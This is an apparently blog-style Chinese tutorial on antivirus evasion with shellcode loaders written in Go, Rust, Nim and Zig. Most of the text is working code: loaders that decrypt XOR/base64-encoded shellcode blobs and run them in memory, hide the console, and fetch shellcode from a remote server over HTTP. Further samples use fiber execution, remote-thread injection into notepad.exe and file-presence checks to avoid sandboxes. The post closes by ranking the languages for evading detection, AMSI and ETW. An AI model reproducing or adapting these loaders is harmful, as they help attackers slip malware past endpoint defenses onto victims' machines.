冷门Go、Rust、Nim、Zig免杀技术
字数 1048 2025-08-12 12:46:04
Go/Rust/Nim/Zig免杀技术详解
免杀语言概述
主流免杀语言特点
-
C/C++:
- 制作免杀的首选语言
- 高级免杀技术多使用C/C++实现
- Github上多数高星免杀项目使用C/C++
-
C#:
- 结合C++性能和Java易用性
- 通过.NET框架访问API
- 基于.NET框架的语言更容易被检测
-
Powershell:
- 基于.NET框架的脚本语言
- 可转为C#程序
- 2.0以上版本需绕过AMSI
-
Python:
- 语法简单但免杀实现复杂
- 需要通过转化间接调用Windows API
- 打包程序报毒率高,体积大
Go语言免杀技术
环境配置
-
安装Go:
https://go.dev/dl/ -
IDE安装:
https://www.jetbrains.com/go/download/ -
代理设置:
https://goproxy.io/zh/docs/getting-started.html环境变量添加GOPROXY=
https://goproxy.io,direct
XOR加密上线示例
package main
import (
"encoding/base64"
"syscall"
"unsafe"
"github.com/lxn/win"
"golang.org/x/sys/windows"
)
func main() {
win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
encryptedShellcode := "iz/0k4efv3d3dzYmNiclJiE/RqUSP/pGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw=="
decodedShellcode, _ := base64.StdEncoding.DecodeString(encryptedShellcode)
// XOR解密
for i := 0; i < len(decodedShellcode); i++ {
decodedShellcode[i] ^= 0x77
}
// 获取VirtualAlloc函数
kernel32, _ := syscall.LoadDLL("kernel32.dll")
VirtualAlloc, _ := kernel32.FindProc("VirtualAlloc")
// 分配内存
allocSize := uintptr(len(decodedShellcode))
mem, _, _ := VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
// 写入shellcode
buffer := (*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize]
copy(buffer, decodedShellcode)
// 执行shellcode
syscall.Syscall(mem, 0, 0, 0, 0)
}
Shellcode加密工具(Python)
import base64
originalShellcode = b"shellcode数据"
encryptedShellcode = bytes([byte ^ 0x77 for byte in originalShellcode])
encodedShellcode = base64.b64encode(encryptedShellcode).decode('utf-8')
print(encodedShellcode)
高级加载器技术
-
加载器+XOR加密:
- 使用RtlCopyMemory复制内存
- 隐藏控制台窗口
-
HTTP分离+XOR加密:
- 从远程服务器获取加密shellcode
- 本地解密执行
package main
import (
"encoding/base64"
"fmt"
"github.com/lxn/win"
"io/ioutil"
"net/http"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
func main() {
win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
resp, err := http.Get("http://192.168.16.109:8080/shuju.txt")
// ... 其余代码与基础示例类似 ...
}
免杀增强措施
- 处理exe熵值
- 添加签名和资源保护
- 在Go代码中加载逻辑代码
Rust语言免杀技术
环境搭建
https://www.rust-lang.org/tools/install
常用命令:
cargo run# 运行cargo build# 打包cargo build --release# 生成release版本
基础Shellcode加载器
fn main() {
const BUFFER_BYTES:&[u8] = include_bytes!("p64.bin");
const BUFFER_SIZE:usize = BUFFER_BYTES.len();
#[link_section = ".text"]
static BUFFER:[u8;BUFFER_SIZE] = *include_bytes!("p64.bin");
unsafe{
let exec = std::mem::transmute::<*const u8,fn()>(&BUFFER as *const u8);
exec();
}
}
文件分离技术
use std::path::Path;
fn main() {
if !Path::new("file.txt").exists() {
return; // 静默退出
}
// ... 加载和执行shell代码 ...
}
XOR加密实现
加密工具:
fn main() {
let shellcode = include_bytes!("p64.bin").as_slice();
let key = "dwadwadwxuan@123Admin1qazqqwsuibdasdn";
let encrypted = xor_encrypt(&shellcode, &key.as_bytes());
println!("Encrypted: {}", encrypted);
let decrypted = xor_decrypt(encrypted.as_bytes(), key.as_bytes());
println!("\nDecrypted: {:?}", decrypted);
}
fn xor_encrypt(shellcode: &[u8], key: &[u8]) -> String {
let mut encrypted = Vec::new();
for (i, &b) in shellcode.iter().enumerate() {
encrypted.push(b ^ key[i % key.len()]);
}
base64::encode(&encrypted)
}
fn xor_decrypt(encrypted: &[u8], key: &[u8]) -> Vec<u8> {
let encrypted = base64::decode(encrypted).expect("msg");
let mut decrypted = Vec::new();
for (i, &b) in encrypted.iter().enumerate() {
decrypted.push(b ^ key[i % key.len()]);
}
decrypted
}
加载器实现:
use std::mem::transmute;
use winapi::ctypes::c_void;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::memoryapi::VirtualAlloc;
use std::path::Path;
fn main() {
if !Path::new("file.txt").exists() {
return;
}
let bs4 = "mD/igIeJrHd4dSA/AWFgYhcsXLsLefozGjn6JWs94jBEKfgWPix41i49LFW+MEShwnxQTjFtRCyopzwwYLuTnCUyJCHpNkH4JlIsdrEC9hl8fHoAE+XAuTIzQSzoqRpWOWCqIfo/azHiIkQocrSNMj+erTbqUP8wdLcjcfh6AoHILKinPDBgu0mRAoI5ai5AaTZdvxGvOSD8IUA+eaUHL8s9enfKJHEgb+Ew6n75OXajNDEjPD8qPi88NjglLSnnm1g0M5GgaXNqGyzme4d+jp6FLBt3OsseCwoIHQEaZDY3Lf6HKP6JNNsiNxc1zJQsXKAmAKMsS7E8Rro0OSM0IMleOB3QnrGcEj4/8bQg1hwgMjMMVaQoP3AgC3kwIDbJIuD9op6mjzc/P+ilP1C2PvGtLF+JY1ozQyTpOzxwy4ovX0qIpj3gpCzisDQEbigp7YYp7a0xsqGRv87NfnCtPzsvi1xnYgqOova1Zuf5YHNkJpu4buD7YGR3k6aIikExMtvjm5KWQWhGOwlxgm44rbjArhN6eI4FqAoigUliMzoXO7NgrWRbR5fpv1FPBGVOmSVPb+fhNzAM9PKcNXj2TQi8JXGBLJjV881+3E13Rt71m1aPoXEkBBYHRCMDBB0QVEQ6Dh4eDQgWV0FPXmAZUVwsFAwdB1MdBEFRPCQ6MElaSlFIRDkNGQULABJEOSxVVEBxChJnMw0JDABFXlVUQUpXNCErVUpVSEQnChEONBYVDFlKXGxkQHBvH/lPt8Ohj8iqeys/KokxCNulJtUNpN2rGtZVed5LCHNSmhU79A+uWlPrTNv/eKNh/CsTwS82xd/a7uQAs6wgydxpSZ6jjCkLWmkCGCyxiJy/AqT6/S/8pdQGGCDtFy/2sBCXVRdGZf4IQwl0CxLTJFqKnld5bGX8dWSSQ9EV+ByRpFJc4aYNGxjWmBiZgJwCjBQTCerav7u0S0K/I4lGjGyR0hx66TjBnm5f5vHUnn9vi+lHKy98mr2fc/OnLnPReerTnk+nk0lEItRhMtqe0dU3m6IpVb7CdWEuQHCKM1FkbSjXcXFhejDLL9cmjJ2xKeA3PSz+hiz+kCz+ojTZbmAxMnrInSzTfKf4g4WkOfS3VeyiENcV72ksdqLhtxSzLyAtKWtAMTIzEaeF9pPOjlBDQ19GRU1HU1JPQlRXZGAxAZ0=";
let key = "dwadwadwxuan@123Admin1qazqqwsuibdasdn";
let decrypted = xor_decrypt(bs4.as_bytes(), key.as_bytes());
let buffer = &decrypted[..];
unsafe {
let ptr = VirtualAlloc(std::ptr::null_mut(), buffer.len(), 0x00001000, 0x40);
if GetLastError() == 0 {
std::ptr::copy(buffer.as_ptr() as *const u8, ptr as *mut u8, buffer.len());
let exec = transmute::<*mut c_void, fn()>(ptr);
exec();
}
}
}
HeapAPI加载器
use std::mem::transmute;
use winapi::ctypes::c_void;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::heapapi::HeapAlloc;
use winapi::um::heapapi::HeapCreate;
fn main() {
let buffer = include_bytes!("./p64.bin");
unsafe {
let heap = HeapCreate(0x40000, 0, 0);
let ptr = HeapAlloc(heap, 8, buffer.len());
if GetLastError() == 0 {
std::ptr::copy(buffer.as_ptr() as *const u8, ptr as *mut u8, buffer.len());
let exec = transmute::<*mut c_void, fn()>(ptr);
exec();
}
}
}
Nim语言免杀技术
环境配置
-
下载Nim:
https://nim-lang.org/download/mingw64.7z -
添加环境变量
-
安装IDE插件(如Pycharm的Nim插件)
光纤执行Shellcode
import winim/lean
import osproc
proc RunFiber[I, T](shellcode: array[I, T]): void =
let MasterFiber = ConvertThreadToFiber(NULL)
let vAlloc = VirtualAlloc(NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE)
var bytesWritten: SIZE_T
let pHandle = GetCurrentProcess()
WriteProcessMemory(
pHandle, vAlloc, unsafeaddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten)
let xFiber = CreateFiber(0, cast[LPFIBER_START_ROUTINE](vAlloc), NULL)
SwitchToFiber(xFiber)
when defined(windows):
when defined(amd64):
echo "[*] Running in x64 process"
var shellcode: array[893, byte] = [
byte shellcode代码]
when isMainModule:
RunFiber(shellcode)
编译命令
-
基础编译:
nim c -r .\shellcode_fiber.nim -
优化编译(减小体积):
nim c -d=mingw --app=gui --cpu=amd64 -d:release --opt:size --passL:-static .\shellcode_fiber.nim
线程注入技术
import winim/lean
import osproc
import os
proc Suspended_Thread_Injection[I, T](shellcode: array[I, T]): void =
var op: DWORD
let tProcess = startProcess("notepad.exe")
tProcess.suspend()
defer: tProcess.close()
echo "[*] Target Process: ", tProcess.processID
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS, false, cast[DWORD](tProcess.processID))
defer: CloseHandle(pHandle)
echo "[*] pHandle: ", pHandle
let rPtr = VirtualAllocEx(
pHandle, NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle, rPtr, unsafeAddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo "[*] Bytes written: ", bytesWritten
echo ""
VirtualProtect(cast[LPVOID](rPtr), shellcode.len, PAGE_NOACCESS, addr op)
let tHandle = CreateRemoteThread(
pHandle, NULL, 0, cast[LPTHREAD_START_ROUTINE](rPtr), NULL, 0x00000004, NULL)
sleep(10000)
VirtualProtect(cast[LPVOID](rPtr), shellcode.len, PAGE_EXECUTE_READ_WRITE, addr op)
ResumeThread(tHandle)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
when defined(windows):
when defined(amd64):
echo "[*] Running in x64 process"
var shellcode: array[893, byte] = [
byte shellcode代码]
when isMainModule:
Suspended_Thread_Injection(shellcode)
XOR加密实现
加密工具(Python):
python .\xorencrypt.py p64.bin
Nim实现:
import winim/lean
proc xorEncrypt[I, J, byte](code: array[I, byte], key: array[J, byte]): array[I, byte] =
var result: array[I, byte]
for i in 0 ..< code.len:
result[i] = code[i] xor key[i mod key.len]
return result
proc Ldr1[I, T](shellcode: array[I, T]): void =
let tProcess = GetCurrentProcessId()
var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
let rPtr = VirtualAllocEx(
pHandle, NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_READWRITE)
var key: array[6, byte] = [byte 0x76, 0x5a, 0x63, 0x4b, 0x36, 0x6c]
var shellcode: array[893, byte] = xorEncrypt(shellcode, key)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle, rPtr, unsafeAddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten)
var oldProtect: DWORD
let rv = VirtualProtect(rPtr, shellcode.len, PAGE_EXECUTE_READ, cast[PDWORD](addr(oldProtect)))
if rv != 0:
var tHandle = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](rPtr), nil, 0, nil)
WaitForSingleObject(tHandle, -1)
when defined(windows):
var shellcode: array[893, byte] = [
byte 0x8a, 0x12, 加密后的shellcode数据]
when isMainModule:
Ldr1(shellcode)
文件分离技术
import winim/lean
import osproc
import os
proc xorEncrypt[I, J, byte](code: array[I, byte], key: array[J, byte]): array[I, byte] =
var result: array[I, byte]
for i in 0 ..< code.len:
result[i] = code[i] xor key[i mod key.len]
return result
proc load_shell[I, T](shellcode: array[I, T]): void =
var key: array[6, byte] = [byte 0x76, 0x5a, 0x63, 0x4b, 0x36, 0x6c]
var shellcode: array[893, byte] = xorEncrypt(shellcode, key)
let MasterFiber = ConvertThreadToFiber(NULL)
let vAlloc = VirtualAlloc(NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE)
var bytesWritten: SIZE_T
let pHandle = GetCurrentProcess()
WriteProcessMemory(
pHandle, vAlloc, unsafeaddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten)
let xFiber = CreateFiber(0, cast[LPFIBER_START_ROUTINE](vAlloc), NULL)
SwitchToFiber(xFiber)
proc checkFileAndExecute(): void =
if fileExists("file.txt"):
try:
echo "file.txt exists - opening calc.bin"
var shellcode: array[893, byte] = [
byte 0x8a, 0x12, 0xe0, 0xaf, 0xc6...shellcode代码]
load_shell(shellcode)
except:
echo "Error Runing"
quit(1)
else:
echo "You are false"
quit(0)
when defined(windows):
when isMainModule:
checkFileAndExecute()
Zig语言免杀技术
基础Shellcode加载器
const std = @import("std");
const win = std.os.windows;
const kernel32 = win.kernel32;
fn Injection(shellcode: []u8) void {
const pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
const rPtr = VirtualAllocEx(pHandle, null, shellcode.len, win.MEM_COMMIT, win.PAGE_EXECUTE_READWRITE);
var bytesWritten: SIZE_T = undefined;
_ = WriteProcessMemory(pHandle, rPtr, @ptrCast(shellcode.ptr), shellcode.len, &bytesWritten);
const tHandle = CreateThread(null, 0, @ptrCast(rPtr), null, 0, null);
_ = WaitForSingleObject(tHandle, win.INFINITE);
}
pub fn main() void {
var shellcodeX64 = [_]u8{
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, shellcode代码};
Injection(shellcodeX64[0..]);
}
编译命令:
zig build-exe .\basic.zig
XOR加密实现
使用Supernova工具加密:
Supernova_1.1.0_windows_amd64.exe -enc xor -i .\p264.bin -lang c -k 1
Zig实现:
fn xorEncrypt(data: []u8, key: []const u8) void {
var j: usize = 0;
for (data) |*value| {
if (j == key.len) j = 0;
value.* ^= key[j];
j += 1;
}
}
pub fn main() void {
var shellcodeX64 = [_]u8{
0x69, 0xdd, 0x16, 0x71, 0x65, 0x7d, 0x5d, 0x95, 0x95, 0x95, 0xd4, 0xc4, 0xd4, 0xc5, 0xc7, 0xc4, 0xc3, 0xdd, 0xa4, 0x47, 0xf0, 0xdd, 加密后的shellcode数据};
Injection(shellcodeX64[0..]);
}
fn Injection(shellcode: []u8) void {
const pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
const rPtr = VirtualAllocEx(pHandle, null, shellcode.len, win.MEM_COMMIT, win.PAGE_EXECUTE_READWRITE);
const key = [_]u8{ 0x95 };
xorEncrypt(shellcode[0..], key[0..]);
var bytesWritten: SIZE_T = undefined;
_ = WriteProcessMemory(pHandle, rPtr, @ptrCast(shellcode.ptr), shellcode.len, &bytesWritten);
const tHandle = CreateThread(null, 0, @ptrCast(rPtr), null, 0, null);
_ = WaitForSingleObject(tHandle, win.INFINITE);
}
文件分离技术
pub fn main() !void {
var file = try std.fs.cwd().openFile("cs.bin", .{});
defer file.close();
var buf_reader = std.io.bufferedReader(file.reader());
var in_stream = buf_reader.reader();
var buf: [1024]u8 = undefined;
_ = try in_stream.readAll(buf[0..]);
Injection(buf[0..]);
}
fn Injection(shellcode: []u8) void {
const pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
const rPtr = VirtualAllocEx(pHandle, null, shellcode.len, win.MEM_COMMIT, win.PAGE_EXECUTE_READWRITE);
const key = [_]u8{ 0x47 };
xorEncrypt(shellcode[0..], key[0..]);
var bytesWritten: SIZE_T = undefined;
_ = WriteProcessMemory(pHandle, rPtr, @ptrCast(shellcode.ptr), shellcode.len, &bytesWritten);
const tHandle = CreateThread(null, 0, @ptrCast(rPtr), null, 0, null);
_ = WaitForSingleObject(tHandle, win.INFINITE);
}
总结
-
Go语言:
- 适合高性能网络应用
- 免杀效果中等
- 需要处理熵值和添加签名
-
Rust语言:
- 性能接近C/C++
- 语法复杂但结构整洁
- 免杀效果较好,但动态检测仍可能拦截
-
Nim语言:
- 语法简洁
- 编译选项丰富
- 免杀效果优秀,特别是结合光纤技术
-
Zig语言:
- 新兴语言,资料较少
- 免杀性优秀
- 适合编写绕过AMS和ETW的代码
每种语言都有其特点和适用场景,实际使用时可根据目标环境检测强度选择合适的语言和技术组合。